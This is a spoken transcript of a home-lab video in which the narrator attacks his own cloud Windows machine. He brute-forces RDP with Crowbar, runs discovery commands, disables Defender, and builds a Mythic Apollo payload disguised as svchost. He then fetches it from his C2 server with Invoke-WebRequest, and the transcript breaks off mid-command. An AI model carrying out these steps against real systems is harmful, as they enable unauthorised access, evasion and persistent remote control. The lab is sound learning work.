So YouTube, welcome to another video. Today's video is going to be quite interesting, and I'm just going to be making some brief explanations about certain things we're going to be doing moving forward. So this video is going to be talking about command and control, which is sometimes called C2, like C and 2, you know. We're also going to talk about Mythic. Mythic is a tool basically used for exploitation. um, I'm also going to talk a little bit just about the MITRE attack framework. So the process where we are moving forward with the project right now is kind of like the attack phase. We're going to be creating a Mythic server that is going to be attacking the Windows machine, and we're going to actually turn that machine to a bot for us. A bot or botnet is basically an attacker who has compromised the device and probably has turned that device into his own, and they can use that device to, you know, do other kind of attacks basically. They can use that for probably denial of service, or they could use that to just basically exploit other devices. Um, a command and control is a process basically where an attacker has control over a device. I'm gonna show you Mythic. Oh, this is Mythic. Let's see what it says. It's a multiplayer command and control platform for red teaming operations. It is designed to facilitate plug and play architecture where new agents can be deployed. You know, you deploy basically a Mythic agent on a Windows server, and you basically turn that server to your bot, you know, and a communication channel, because from the Mythic machine you can, you know, pass certain commands into like the Windows machine, or probably a Linux machine, whatever device you probably just attacked, make modifications, and all of this can happen on the fly. We have a web-based, it gives you a web-based interface. So basically what that means is like, it's not like the command line where it's like, you know, it's like you got your command line, you know what the command line is, but instead it gives you a very pretty interface, like you just go into your browser, like you go into Facebook or something like that. So it gives you like a very good view where you get to see your agents, you get to see the devices you have under your control. So that's a bit about Mythic. And I'll just quickly talk about the MITRE attack framework. So the MITRE attack framework, it's kind of like in connection with Mythic, because the MITRE basically is a framework that gives you documentations on series of exploitation, series of attacks. So you could have a DDoS technique. It basically focuses on the TTP, which is the tactics, the techniques, and the procedures of like how adversaries basically try to, like, you know, make advancement towards attacking organizations. So that's what the MITRE attack framework, it gives you a breakdown of like how the attacker would probably, what was his agenda, what was his goal, you know, the techniques, how he did it, and procedures, like what tools were put in place, you know, to make it happen. So all of that is just in conjunction. So we're going to be moving forward. We're going to be deploying a Mythic server that's going to be trying to exploit the Windows machine. We're going to try and attack the Windows machine, try some brute force and install the Mythic agent on the Windows machine. So let's see how that goes, guys. So if we jump with me into the video. So like I said, we're going to be deploying a new server. So we're going to click on deploy new server. We're going to be deploying a Linux machine for our Mythic. No, the Mythic runs on a server, if you know what I mean. So it's just like the way we deployed the Elasticsearch. So we're going to be deploying a web server basically. I don't think I need anything goofy, so we're gonna go with shared CPU. We're gonna pick the location, which is London. Then what is gonna be the size of the device? We want a 2V CPU, 4 gig of RAM, 2V CPU, 4 gig of RAM, and 8 gig. So I'll be going with this one. So we're gonna click bigger software. So we're gonna pick the operating system. We want a Ubuntu machine. I want a version 22.04. You know, we don't need the automatic backup. Cancel that. Cancel. We don't even have the IPv6 connected, so we'll leave that as it is. The host name, we're gonna name the host name, rename it my sock dash mythic. I'll just put everything in all caps. iSock dash mythic. So, like I said, the mythic tool is going to be running on a server. So we're going to be deploying a web server basically. I don't think we don't even need to connect it to our IP because it's a separate device. You wouldn't want to put your attacking machine into your environment. It doesn't make sense. So they're going to definitely assign us a public IP address that is not associated with our internal network, if you know what I mean. So I think that's all. I'm just going to deploy that machine. So we're going to have that deployed. We're going to give you a couple of, minutes, seconds. Let's go back home, compute, and wait for, you can see the Mythic machine is still installing. So I'll bring you guys back when it's done installing. All right, guys. So now we have the Mythic server, the basically the Ubuntu machine installed. We're actually going to be deploying the Mythic server. But just before we actually do login, I already created an attack diagram. So I'm just going to show you what the attack diagram is. And like I said, like having like a diagram, like a topology, gives you an idea of what you're trying to do. And gives you an idea of what, like how you're gonna, put certain systems in certain places. So I'm just gonna show you guys. So this is gonna be the face of like we basically the face of the attack and how we're gonna go about it. So we have the phase one, which is the initial access. So we're also going to be using a Kali Linux machine on my personal device. I already have that installed. I already have like Kali installed on my device. I've always had that. So that's going to be the attacker's laptop, which is going to be the Kali machine. And we are going to be doing an RDP brute force attack through the internet to the Windows machine, which is our Windows machine that's in the cloud. So for my Kali machine, my Kali window that's operating on my personal device, I'm going to be performing an RDP brute force attack to the Windows machine that is on the cloud. So we're going to basically successfully authenticate into that machine, to the Windows machine. Then we're going to move to the next stage, which is going to be recovery. This is not like like the Cyberkill Chain or probably like the MITRE attack framework or the diamond intrusion what's it called? It's called the diamond. I need to find out. It's called the diamond intrusion. I feel like it's not intrusion. Yeah. The diamond intrusion model. It deals with. I don't want to look at the screen. It deals with. It gives you the 4 steps, which is the adversary, the capability, the infrastructure, and the victim. It's 4 phases. So let's see. Yes, sir. We got that right, innit? So yes, we got the adversary, capability, infrastructure, and victim. I was just trying to remember the name. So it's the diamond intrusion model. Yeah. So basically, my attack diagram is not basically following any of that, but it's still kind of like similar. Like with the Cyberkill chain, you have I think it's a 7 step probably, where you have your reconnaissance, you have your weaponization, you have your after you weaponize, you probably want to deliver. Then you have your exploitation. Then you have your installation. Then you have your after you've installed, probably you want to do your you establish a C2, so you have your command and control. Then you perform your action on objective. Then I think that's about 6 steps. Let's even see if we're actually right. I'm gonna search the Cyberkill chain. Cyberkill chain. Just gonna pop this open. Oh yeah, just like I said, it starts with the reconnaissance. Reconnaissance in the state of like where you are trying to do some findings about an organization, about a person, or probably about a CEO if you're probably trying to do like a spear phishing or a whaling, something like that. So you find particular individuals, excuse me, then you do the weaponization. So basically, from your reconnaissance stage, you try to weaponize. Either you create like a payload or a custom payload, or probably someone's, you know, exploitation, or you just use the metasploits because metasploits If it's a vulnerability that already has some sort of exploitation code out there already, that even makes it more easier for an attacker basically to just attack you. So after your reconnaissance stage, you weaponize the code, you weaponize your you move into the next stage of getting ready to attack that device. Then we have the delivery, like I said. After weaponizing, you need to find a way to deliver this weaponization, that's the weaponization code. So the delivery phase can be probably through a USB stick, a physical media. It could be through a phishing email. It could be through any means, basically. Then we have the exploitation. So this is when, after you've delivered this exploitation, you have either the user clicking a link, and which makes that exploitation to actually kind of like start. You know what I mean? Then we have the installation. So if we kind of like reference this back to what I'm trying to do, um, you can say I've probably done my reconnaissance stage. I've tried to, we're going to go through that whole process. I've tried to find the IP address of this server. I've seen, oh, like there's a vulnerability, maybe um, the Windows Defender is probably turned off. There's no security, or there's no strong password policy or something like that. I just figure something out. Then I kind of like, oh, I would know what tool to use for my weaponization. I would know certain commands. Then I deliver that through probably a phishing email, having the user click on the link that gives me a process for my brute force attack to start. You know, then you establish the installation phase is probably like you just establishing like a Mythic agent, basically. Let's say you click on the link, and that link automatically downloads the Mythic agent onto your device. That's just what an installation phase would be. Then you have the command and control. Yeah, it's a 7-stage process. You got the command and control, just like the Mythic machine. I'm going to show you guys in a bit. The Mythic machine is going to be the command and control, where you have your devices and you can control them from a remote end. Then action on objective, that could be data exfiltration. That could be you trying to probably install some ransomware. It could be whatever your desire, but basically your action on objective, what you desire to do with that machine. So yeah, what I'm doing with my attack diagram is quite similar to like the Cyberkill Chain. So I'm just gonna keep going. Yeah, just continue talking about it. So like I said, the phase 2 is gonna be the discovery. We're going to discover more about the Windows machine after we've logged in. Like, use the commands who I am, IP config, try to figure out the IP address, like the users on the device, and also like the users, like the groups. Those are just some basic commands that I typed out, that I'm going to use. Then the phase 3 is going to be the defense evasion. So basically, we're going to disable Defender. So we're basically going to disable Defender. So like that doesn't send some certain kind of logs, or send basic like an alert, to the SIM or things like that. But if you remember, we set a rule on the SIM in our sysmon stating that if you disable the Defender, you still get an alert. So that's one of the things as a security analyst you need to be proactive. You need to consider like a lot of things that these attackers would probably want to do to like probably evade being being caught. So setting a rule that states that whenever the Windows Defender is turned on, please send an alert stating who basically did that. We can find the device that actually turned that off and the user, moving forward. So phase 4 is execution. That's going to be us executing the Mythic agents. We're going to be installing the Mythic agents, into the Windows server. The Windows machine is going to do an outbound call to the Mythic server. The Mythic server is going to respond back to the Windows machine. Then we're going to make an establishment, execute the Mythic agents, and basically that Windows machine is going to be sent back to the Mythic server. Then we've established a C2 here in phase 5, which is command and control. You can see we've established a C2. And the phase 6 is going to be exfiltration. So we're gonna be creating some fake password file called password.txt. Then we're going to be downloading that password file from the Windows machine into our Mythic machine. Just like in a real organization or in a real life scenario, you would have the attacker trying to basically steal some confidential information from the organizations. So you see them, that will be the action on objective, basically trying to like download certain password files, probably download confidential documents, some financial records or credit card information. It could be anything. So this is the attack diagram. That's going to be the attack diagram. So I just wanted to just show you guys that real quick. So yeah, we're going to move into the next stage of, installing the Mythic on our Ubuntu machine. So I'm just going to basically SSH into that. It's my PowerShell, and I'm going to open a new terminal. So we're going to SSH root, copy the IP address, paste that in. I'm also going to copy, yes, I'm going to copy the password also and paste that in there. I'm going to clear out the screen. I feel like we haven't been on the terminal in a while. I feel bad. I feel more comfortable, working on the terminal and then having like the visuals, like the web, like the web GUI. So yeah, like I always say, first thing you always do when you install a new Linux machine is you always want to upgrade and update. So I'm gonna do an apt-get apt-get updates and apt-get upgrade -y and hit that. So we're gonna wait for that to update. All right, so we have the system basically updated. I'm gonna clear the screen out. So what we're going to be doing next is we're going to be installing a Docker Compose, what runs the Mythic machine, like the Mythic server itself. So I'm going to do an apt install Docker -compose. Yes, I don't think that's going to take a long time. Okay, that's installed now. We have our Docker installed. Another thing we're also going to install is make. So I'm going to do apt install make. Okay, that's good. Try that out. So now I'm going to install Mythic. So I'm going to type out the command, which is git clone https://github.com/ this is just like a URL, it's like, I'm just going to type it out, features slash Mythic. Before I paste this, I'm going to see if I can actually find this page, just to make sure I'm actually writing typing like, right now the right thing. Let's see if we can find that. So yeah, now that we know the command is, is good. So basically going to hit enter for this. We're going to clone that. I hope you guys are loving the video so far. This is a lot of work, but I love it because I'm just learning. Like I said, this is a learning process for me. I'm happy doing this. So please, I want you guys to still, hit the like button, subscribe to the channel, and also share. Just share this to like friends. Try and put me out there. I love cybersecurity so much that I just want to get better at it. I want to learn, and I'm going to be doing more labs, more labs coming. So that's all done now. We're going to clear out the screen. Let's do ls. Let's see if we have, yeah, you can see we have the Mythic right there. It's successfully installed. Let's change directory into the Mythic, actually. There's a capital M. So we're in the Mythic, ls, we're going to be installing the Docker, which is this one. We're going to install this. If you don't know what a Docker is, actually a container. A Docker is a container. So yeah, we're going to actually install that. So I'm going to do // install underscore Docker underscore u tab enter. We have that installing. So you guys will be seeing the Mythic like server very soon, because this is what I'm actually doing. I'm deploying the Mythic web GUI, like the web server. So I'll be showing you guys that pretty soon. It's fancy. It's like I like it. It's a very nice, you got a nice view to it, you know. Okay, enter. Okay, that's done. Going to clear out the screen. Then I'm gonna do a system CTL restart Docker. So Docker is a container. Like I said, it's a lightweight container. It's different from like virtual machine. Oh wait. Go for Docker essential because control process. Yeah. You can imagine. I did it first time and it didn't work, but now it did. So let's check the status of that. Let's see if our Docker is running. System.ctl Docker. Yeah, you can see that it's active, running. Just gonna cancel that out. I'm gonna start the Mythic server actually. So I'm gonna do make. So I just run the make command and we're gonna execute Mythic -cli. You can see, if I can, let me go back so I can show you. Okay, yeah. You can see this is the command to actually start Mythic. That's what I'm about to type right now. The execute command /mythic-cli starts to bring up all default Mythic containers. So that's what we're actually. So while I was actually recording, my camera actually died. I think we actually stopped at the part where we already installed the Docker. We also installed Mythic, and I already executed the command. I think I'm going to just attach the clip so you can see it, because I just made like a recording of it while it was still going, but my face was not like in the motion. But I might probably just upload it also too. But yeah, so we have Mythic running now. So just before we actually move on, I actually want to configure like the firewall rule for my Mythic server, because I don't want like the whole internet getting access to like Mythic machine and also trying to probably like exploit it just the same way, like they've been trying to get into like the Linux machine and also the Windows machine. So I'm going to create a firewall rule for Mythic. I'm gonna go to. We're actually gonna create a new firewall rule. So I'm gonna title this my sock. I think all caps. My sock dash Mythic dash firewall. So I'm gonna title that my sock dash Mythic dash firewall. Yeah. Then we're gonna create a protocol. We're only going to accept an inbound rule basically from TCP. Port range from 1265535. We're going to change this to my IP. So it's going to be strictly just my device, basically, that can, accept inbound like rule, like inbound connection, I mean. So yeah, okay. So action accept TCP is this. Okay, I'm just gonna add that. And I'm also gonna create another rule because I only want the Windows machine and also the Linux machine being able to like connect to the Mythic server. So I'm gonna also create like a custom rule for my Windows machine and the Linux machine. So I'm going to just go copy out the IP address for my Windows machine. And we're going to go back to firewall rule and click on this. So we're going to also add a TCP connection, port range from 12 that custom. We're going to paste the public IP address of the Windows machine here and also add that. I'm also going to do the same for my Linux machine. Okay, that's this guy. So we're going to also go back to the firewall rule and configure that also. So TCP connection, port range 1265535, custom role, my public IP address of the Linux machine, and I'm gonna save that. Okay, so now that the firewall rules have been configured, we're also gonna need to add it. So we go back to the Mythic machine, go to settings, then firewall rule. So we're gonna add our firewall rule we just created, which is this one. Then update firewall group. So now we know we've configured like the firewall rule for the Mythic server. It's just a way of just like to tighten like the security of it, not have everyone trying to like, basically force their way into like the machine. I'm not trying to like stress, like the server or anything like that. So now that we have that configured, so I think we're going to move on like to the next phase. So we're actually going to open up the web like terminal basically. So I'm gonna go over to a new browser and we're gonna type out I need the IP address of the Mythic server itself, HTTP. So let me copy out the IP address of the Mythic machine. No, I don't need that out. And this is going to be using the ports 7443 for like the communication. I think that's it. So we should be able to open yeah, advanced. So you can see this is the Mythic web server we just reinstalled and deployed. Everything we're actually doing from installing Docker. So this basically runs on the Docker, which is a container. So the login, we're gonna find the password and the username actually. I think the username should be Mythic. Yeah, it even says it there. The username is Mythic underscore admin. But I'm gonna try and actually find the password. I'm gonna find that here. So ls-la. Okay. The ls-la shows us also like hidden files that we have in our Linux machine. I think the document we're interested is the .env file, which is this. That's what we're interested in. So I'm going to cut out this file, the env, to see the password for the Mythic machine. So I'm going to do a cut env. And we're going to look through for the username and password. So you can see where it says the username, Mythic underscore admin underscore user. You see the username is Mythic underscore admin. And my password is right here, Mythic admin password. So I'm just going to copy that out. So we don't need the hyphen. Let's paste that in and let's see if we can log into the machine. As you can see, we have the Mythic running right now. Like I said, remember, Mythic is a tool used by red teamers basically for exploitation. They use this to establish a C2, a command and control. Okay, guys, so we're going to be making some changes to like the password policy. And we're going to find that in the local groups. So I'm just going to search local group. Yeah, click on that. All right, and where we can find the settings for that is on the Windows. Then we go to security settings. I might actually need to make this a little bit bigger. So in security settings, I think it's account policy. Then we have password policy. So you can see right here, the minimum password length is 14 characters. Basically, our characters wasn't up to that amount. So we're going to make some changes to that. And we're going to change the minimum password length. We're going to change this. We're going to change that to 5. We're also going to change password must meet complexity requirement. We're going to disable that. Disable, apply. Okay. I think that's the main things we need to really change. We're going to go back to creating that password. So click on administrator, change account settings. We might have to make this big. So we're going to go to sign in options, password, change password. Let's copy out the password from the machine, paste that in there, then type in our new password that we're going to be brute forcing our way into. Okay, season. So I'm pretty sure you can see it actually worked now. So we've successfully changed the password. So now we're going to start the attack phase, which I'm going to be using my personal Kali machine. So I'm just going to set that up real quick. So I'm going to set up my Kali machine. I'm going to try and log into my personal Kali machine on my device itself. And we're going to move on to the attack phase where we are going to brute force our way to the Windows machine. All right, guys. So I have successfully opened up my Kali machine. So this is the device we're going to be using to perform our brute force attack. I'm just going to quickly update the repository because I haven't used this in a while. So we're going to do an apt-get update and an apt-get upgrade -y. I think I need sudo for this one. Okay, so our update is actually done. So the file we're going to be using for our brute force attack is called roq.txt. It's a file that has like a list of like compromised like passwords that have been leaked on the internet. It's a very large file actually. So I'm just gonna show you guys the file first. So we're gonna go cd/user. Yeah, that's it. Then hit the ls command. So the file we're actually interested in is the roq.txt. I'm gonna open that file up so you can see the file itself for yourself. As you can see, that is passwords just loading up. Uh, your password might even be there, Um, you can see it's still even loading up. That's to tell you how much password we literally have like saved in the roq.txt file. I'm just going to stop this because I think it's very large. But like this is just to show you like the amount of like password like that has literally been leaked on the internet. So you have to use very secure password basically for anything, you're logging into your bank, you know, setting things that that are very important to you, your device, you gotta use strong passwords for them. It hasn't even stopped, but I'm just gonna stop that myself. You can even go through a look of like the passwords on Norma. That even sounds Nigerian. Onolulu. Onome. We got Onome right here. In case you use your name, just know you have your password. You gotta change that. If your name is Patrick, change your password, Patrick. As you can see, it's a whole lot, like literally. And I just had to stop it. So I still have more. These are basically passwords that people can literally use to like brute force into your device. Look at that. That's my sister's name. If you're seeing this video, you probably used your name for your password. Please change that. So what I'm actually going to do next is be creating a file. I'm going to create just a file like so I can put in like few passwords into that file, then use that file to actually perform my brute force attack. Because the word list is so large, I really I don't need so much processing power for that. So I'm gonna do the command right now, sudo, type in that command, sudo, that's what type in. Okay. So we're gonna do sudo head 50 the roq.txt file. Then we're gonna send that into /home/Kali. Then we're going to call this file my doc-word list. Yeah, I think that's good. Okay, so if we go back, let's see if we're going to find the file we just created and do ls. As you can see, we have my word list file right here, my sock-word list. Should be a txt. I'm supposed to actually add a .txt. Let's see if that opens up. So that's my so you can see we have the files in here. The head command should show you the first 10, but this looks more than 10. And the tail command shows you the bottom, like probably like the last 10. Or anyway, I'm just gonna clear that out. So what I'm gonna do is I'm going to actually add the password for the Windows machine because we're trying to make it quite easy. So I'm just gonna add the password to the word list so I can easily brute force that machine. So I'm gonna do a nano my sock. Okay. And just to add that on top, so we're gonna put the password right there. Probably add the other passwords too. Don't steal my password. I think that's why I named it. Don't steal my password. Then I did really okay. You know what? Let's copy that. I actually want to put this at the bottom. Just put it at the bottom. So we'll type that out back. Into 2005. Then don't steal my password. And also QWERTY. Alright, so I'm just gonna save that out. Control X, Y, enter. Okay. All right, so now that we have successfully created like a new file for the brute force attack, I'm going to just update my repository. We're going to be using a tool called Crowbar for brute forcing. It's a tool basically used for like to brute force into like devices. So I'm just going to wait for this to update. All right, guys, welcome back. So we are actually done with the update. It took a really long time. It took a really long time for like the updates and the upgrades to be done, but we have it done now. So we're just gonna move forward basically. So so I'm gonna type in this Crowbar. If you remember, I said we're using the tool called Crowbar for the brute force attack. So I'm gonna type in Crowbar dash H, which is Crowbar for help. That's basically just seeing like the options it has. So as you can see, the different options in Crowbar, we have a dash V for verbals, we have a dash C for passwords. This is kind of like the the commands you're going to use when trying to perform a brute force attack. So I'm just going to clear that out and let's go straight into the attack. Just before we do that, I want us to create a text file for the target machine. That's the IP address of the Windows server. So I'm gonna create a file. So we're gonna say nano. We're gonna call this target.txt. Nano target.txt. And I'm gonna copy out the IP address of the Windows machine, which is the Windows server that we're gonna be brute forcing. So I'm gonna copy that out. Then we're gonna go back to the Kali machine and paste that there. So now that we have the IP address pasted in, I'm gonna Control X and Y and enter, save that out. So if we type ls, I'm sure we're gonna see the file. Yes, you can see we have the file right here, target.txt. If you want to see what's in that file, you can cut it out just to see. You can see it's the IP address we have just literally pasted right there, which is that. So I'm gonna clear that out for my screen. So now we're going to be attacking the Windows machine. Basically, we're going to perform a brute force attack right now to try and extract the password. We actually changed the password just to make it a little bit easier for us. Uh, People might say it's cheating, but it's a training, so which is quite good because we're trying to learn from this. I'm trying to learn from this basically. So I'm going to type in the command right now, which is crowbar. And secondly, this is for ethical purpose. Like, please do not try using this tool to try and brute force your way into other people's devices. You know, you're gonna get arrested for that. So, crowbar dash B IDP dash U as the username. Dash B is the protocol. Dash U is going to be the username of the Windows machine, which is administrator. Administrator. I put an E. Trying to type a D. Oh yeah. So username is administrator dash C is gonna be, I think it's a capital C. It's gonna be the word list. So we're gonna put in our word list, which is my, you know what, just to verify, because I want to know if it's a capital M or, because remember, like everything is valid here. So I'm just gonna clear this out first. LS. Okay, yeah, it's a small letter. Okay. You know what, I'm going to even leave this out there. So Crowbar batch H. I want to see what the B command is, just to be verified. Crowbar. Okay, so dash B, like I said, yeah, it's the service basically that's running on the device. You have OpenVPN, we have RDP, we have SSH key, which is for Linux machine. Um, so yeah, that's the target service. The S is for server statics or the static targets. Okay, we know the dash E is for the username. Dash C is going to be for the password that we're going to use to perform the brute force. So yeah, let's clear this. Let's just clear this out. We'll clear that out. ls. Then now we're going to type in the command crowbar dash b rdp dash u. Then we type in the username, which is administrator. Then dash c is going to be my sock tab. Thank you. Then we're going to do dash. That's going to be the server now. Dash s. Then we're going to paste the IP address. I'm just going to paste the IP address there. /32 network. And let's see if that works. So now you can see we started Crowbar. So now Crowbar is basically trying to brute force his way into like that device. As you can see um you can see we got the password for the account as administrator. As you can see, we have the password right there. You can see it didn't even take so long. It took just a couple of seconds, not even up to like a minute. And we're able to literally find the password for the Windows machine, which you guys remember we changed to winter 2025. As you can see, we have it highlighted right there. So that's how you kind of like perform like a brute force attack. It's as simple as you just typing out a command just like this, and it's going to query that database with the amount of word list it has, like the words list, like the stolen password it literally has in its database. So now that we have that, I'm going to also connect to the Windows machine from my own Kali machine. And we're going to be using a tool called X-Free RDP. So I'm going to type in that X-Free, just take that away, RDP /u admin. Then we do a /p, which is going to be for password. And the password is winter 2025, just as it says right here. We just got that information. An attacker just got that information, which is, we're the bad guys now. Right now, we're trying to get into the company's device, and see what we can steal from them, you know. So -v, we're going to put in the IP address and show port 3389. So that's the port we use, 3389. So let's see if we can log in. Yes. Okay, let's see the magic, guys. We are successfully logged into the Windows machine from my Kali machine. Isn't that just beautiful, guys? You can see This is the Kali machine on my screen, and this is us literally, RDP our way into the machine, actually performing a brute force attack. So what I'm gonna do is I'm gonna perform some reconnaissance. Um, we're gonna see if we can. Wow, this is quite hard to see. I'm gonna make the screen bigger, probably so I can see the whole thing because it's quite hard for me to navigate my way. So if you just bear with me. All right, now that we have that opened up, so we're going to perform some basic, reconnaissance. A prompt, one prompt. Let's see. Okay, we're going to open up the command prompt. Command prompt. Then we're going to type in who am I. Basically, this command shows you who the user, like who the owner of, like the user of like the device is. It shows the name. It shows probably some groups of like the local machine, and you can see the user of this device is the win-richard argo slash administrator that verifies that we're in the Windows machine, as you can see. I'm going to perform some more reconnaissance, and this is kind of like a passive reconnaissance. It's like we're not really doing anything. We're just trying to gather like certain information about a device itself. I'm going to do an IP config. Let's get the IP address. As you can see, the IP address is 78.141.247.169 with a subnet max of 255.255.254.0, the default gateway of 78.141.246.1. So that show tells us we're getting more information about the device. Now we have the IP address, we have the username of the user who has this device. We know it's an administrator account. We're going to do some more reconnaissance. I'm going to do a next user. See, we also get the user accounts. If there were other users probably using this device, like because you can have certain people use the same device, we would also have it listed here. As you can see, user account for this is just one. It's the administrator. It's the default account. You know, So just some more, this is just doing some reconnaissance, gathering information about the device, getting more information. I think the last command I'm going to type is net user administrator. And the username could not be found. I didn't type that out correctly. As you can see, we've gotten more information about the user. We have the username administrator. If it was a normal user, we'll have the full name of the user right here, which we can use to probably do some phishing attack, you know, because we will gain the trust of like the other users in the company because we've literally compromised the device, and this device probably sits inside like the organization. So you can now use that to kind of like, pivot your way into other devices. Let's move on. See, it also gives us information of the password last set. It tells us when this password was last set. You can see it was on the 1st, 26th, 2005. It tells us the time. Um, you know, last log on, it tells us when the system was actually last logged on, you know. So this is quite useful information you would want to actually gather, as an attacker, to kind of move on to your next phase, like move on to like the next agenda, you know what I mean? So I'm just going to take you guys back to the attack diagram just to show you where we are as of now. So we're just going to open up our attack diagram. So we performed a brute force attack to the Windows server with the Kali machine. That was the first phase. We had a successful authentication because we were able to log into the device via RDP, which you guys saw. Uh, we have also performed some discovery. You know, we got to know who the user of the account is. We also got the IP address of the machine. We also got the net users. If there were more users, we would have seen that there. We could also do net group, but there are no group users, so there's no need. So now we are in the phase three of of our attack phase, which is the defense evasion. So we're going to be disabling Defender on the Windows machine. Remember, I told you guys if we actually do that, we're still going to get an alert in our sim because we are ingesting logs on if the defender is disabled, we're going to get an alert for that. But so let's go back to the attack. Let's go back to the Kali machine, to continue with this attack basically. So we're going to disable the Windows Defender. So we're going to search for Windows security. Well, I know I'm going to turn off the real-time protection. We're going to turn off that. And we are also going to turn off the cloud delivered protection. Turn that off also. You wouldn't want to have this turned off in a production environment or like in an actual, situation. But this is what an attacker would probably do. They would disable your defenses, so they can do what they want to do without being without being detected, basically. So now since we've disabled that, we're going to move into the next phase, which is going to be us establishing the C2. We're going to be establishing a command and control using Mythic. So I'm going to just close this out for now. Let's just make this smaller and close that out for now. So we're going to go back to Mythic. We're going to log in. I can't remember what the password is, so we need to go find the password for Mythic. I guess we're going to have to log in back into our device. I'm going to copy out the IP address for Mythic. Go back to PowerShell. Then SSH root at paste the IP there. Oh, that's my bad. Is that the IP? Oh yeah. Okay. SSH 192.248. Yeah, that's the IP address. So we're going to copy out the password. Paste that in there. And voila. We're logged into the Mythic machine, the Mythic server. I'm gonna play that out. So now I'm trying to get the password for the Mythic web server so we can log into the device. And I know it's in the env file. Yeah. What do you mean? ls dash l dash la. What happened to our env file? Okay, let's actually cd into Mythic. I'm not in the directory. Okay, so ls dash la. Yeah, we have the file right here, which is the env. That's where we have the username and password for the Mythic web GUI. So I'm gonna add that open dot env, and we're gonna look for the password basically. So you can see right here we have the admin user, which is what we already imputed, and we have the admin password. So I'm gonna copy this out, copy the password, and we're gonna go paste it in our login page for Mythic so we can get back into, yeah. So now we're active in it. So we're gonna actually search for Mythic agents because we've not enrolled the agent yet. So what we're trying to do right now is have the Windows server install the Mythic agent onto the device, and we will be able to establish a C2. So what I'm gonna do is just go on this Google search and search for. Let's even before we actually do that, let's go back to the power. Yeah, okay. Try this out. So I'm gonna actually start Mythic. So I'm gonna execute Mythic right now. Mythic CLI, so the command line interface. So yeah, we are now in the command line interface. Containers, commands are grouped by user outlet. You can see it gives us like the different options we can use with Mythic. Okay, I think we're good. So now let's go back to the search. I'm going to search for Mythic agents, and we're going to open up the Mythic agents with the GitHub. So we're going to actually go to the agent capability. Yes. And you can see the different types of agents we have: Apfel, Apollo, Athena, Freya, Hermes, Hems. Wow, they got a really cool name. So these are like the different Mythic agents we have. You can also see their capabilities. You can see the versions they have. You can see the operating system. They can basically establish a C2. Like Apollo works on the Windows. Apfel works on Mac OS. You know, we have some that can work on not just Windows. They could work on Windows. They could work on the Mac, and they could work on a Linux machine. You have Merlin, which is quite powerful. As you can see, it operates on the FreeBSD. It also operates on a Linux machine. Operates on the OpenBSD, and so on. So you can also see its payload output formats. You know, an EX. I think that's for Apollo. Yeah, EXE. Supported C2 profiles, CCP. So this shows you all of like its capabilities of what the Mythic agent can literally do. This is a powerful tool that for you to establish a command and control basically. So now we're going to go back to the Mythic server, which is on my PowerShell. I'm going to clear the screen out. So right now we're going to be installing the Mythic agent onto the Mythic server first. So I'm going to type in this command, the dot slash, which is the execute command, Mythic install GitHub https slash github.com slash Mythic agent. So hopefully it should work. Nope, it didn't work. I didn't get something right. No such file or directory. Yeah, just looking at the command, I can see I didn't type it correctly. I'm just gonna, it needs a dash CLI. So let's see. Failed to install service, failed to clone repository. So that didn't work. So we need to actually do some troubleshooting. Let's find out why. So I realized that my Apollo didn't install, so I'm running the command again. And we can see it's actually trying to install right now. It's running the Apollo agents. Because when I went to my web server, I couldn't find it, and it's supposed to actually be here. So right now we're running that command again. So let's just see if we're going to have it pop up. So successfully installed service. Okay, let's go back to the web server. And yes, you can see we have Apollo agents, and we also have our C2 server. So we are actually good to go. So now I'm gonna go click on the biohazard. I'm gonna click on actions and generate a new payload. Yeah, we're gonna select the Windows machine because that's what we're gonna be establishing the seats on. We're gonna go next. We already have this WinExec. I think everything is fine on this end. Then we're gonna click on next. I'm gonna forward everything in. So these are all like the available commands that Apollo can actually, execute on the Windows machine. You can see net stats. Like these are all the commands you can basically just execute on the Windows machine once you establish a C2, So I'm just gonna push all of that in, all commands. We also get documentation. I think we can see that. Just more usage of how you can use Polo, how you can use his commands. You see, it shows you how you can use like basically the commands to find certain things, the CD and all of that. But yeah, so I'm just going to click on next. I'm going to turn this on, callback host. I'm going to put in the IP address of the Mythic machine itself. Let me just go copy that out, which is this. Copy that out, come back here. So we're going to clear this out and we're going to paste in the IP address of the Mythic machine. I think that's all we need to actually change. Callback intervals that's 10 seconds. Callback port is port 80. So I'm going to click next. So now this is where we name the file payload review. So I'm going to change this payload name because basically this is what is going to, like the file name is going to carry. So I'm going to change this to payload. I'm going to change this to SVC hosts. Something more relatable that like probably whoever's investigating would not think about, like, oh, that might be a malicious file. So I'm just going to change that to service host dash Richard. I know I use my name for everything. It's my project, it's my work. So service host dash Richard argo.exe. Then we're going to describe this as my SOC challenge payload agents. So I'm just going to title that my SOC challenge payload agents. Okay. And now we're going to click on create payload. So we've successfully created our payload for the Apollo agents. So we're going to move forward. All right. So now that we've successfully installed our payload, I'm going to copy this link, copy link address. Then we are going to go back to the Mythic server. I'm just going to clear out my screen, check the present working directory where we are. We're in the root Mythic. And I'm going to do a wget and paste that link there. One error. Oh, it needs a self-signed certificate. So I'm just going to do that and add no check certificate. And yeah, that successfully worked. I'm just going to copy on my lease. Let me see. ls. We should see the file, which is this. We kind of actually did this because the URL was quite lengthy, as you can see. Let me paste that in my notepad. You can see the URL was quite lengthy. So we kind of like just shutting out like the URL. So I'm going to come back here. So now I'm going to move this file into a different file and name it service host. So I'm gonna move SO05 tab. I'm gonna move that file to SVC host service host dash Richard agwu.exe. Enter ls. We should find our file name here. You can see. So we've actually moved this actual file into a new file called servicehostrichard.exe. I'm going to also make a directory. I'm going to make a directory, call it 1. And I'm also going to move this file right here into that directory. I'm going to move the servicehost-richard.exe file into the make1 directory, into the directory which is called 1. I'm going to do a move svc tab, and I'm going to move that to 1. Okay. So let's go cd1, run ls. As you can see, we have our file right now in this one directory. We're going to move into the next phase, which is going to be, we're going to open up a listener, and we're also going to invoke the payload on the Windows machine. So just before I do that, I'm going to do a firewall, a UFW allow port 9999, UFW allow port 9999, and we're going to do a UFW allow port 80. These are going to be the listening ports. Then I'm going to start up the service that's going to be doing this listening, which is going to be Python 3-m http. So HTTP server 999. So we actively have that listening. So now I'm going to go back to, I'm going to just close this out first. Then we're going to go back to our RDP session from the clouding machine. Try and log back in there. As you can see, we're still logged into the Windows device. So from the command prompts, I think it's actually from PowerShell. We're going to invoke that from PowerShell. All right, so from PowerShell, we're going to type in this command, which is quite lengthy actually. Just to make sure I typed it correctly. Invoke dash web request URI HTTP 192.258.158.19c port 999 slash service host, which is our payload, richard.exec. Then we're gonna put that file into the user public download service host.exec. So capital P. Remember, like I told you, everything about this are kind of like sensitive. Like you have to use the right letters, the right, when it's the capital letter, you gotta use a capital 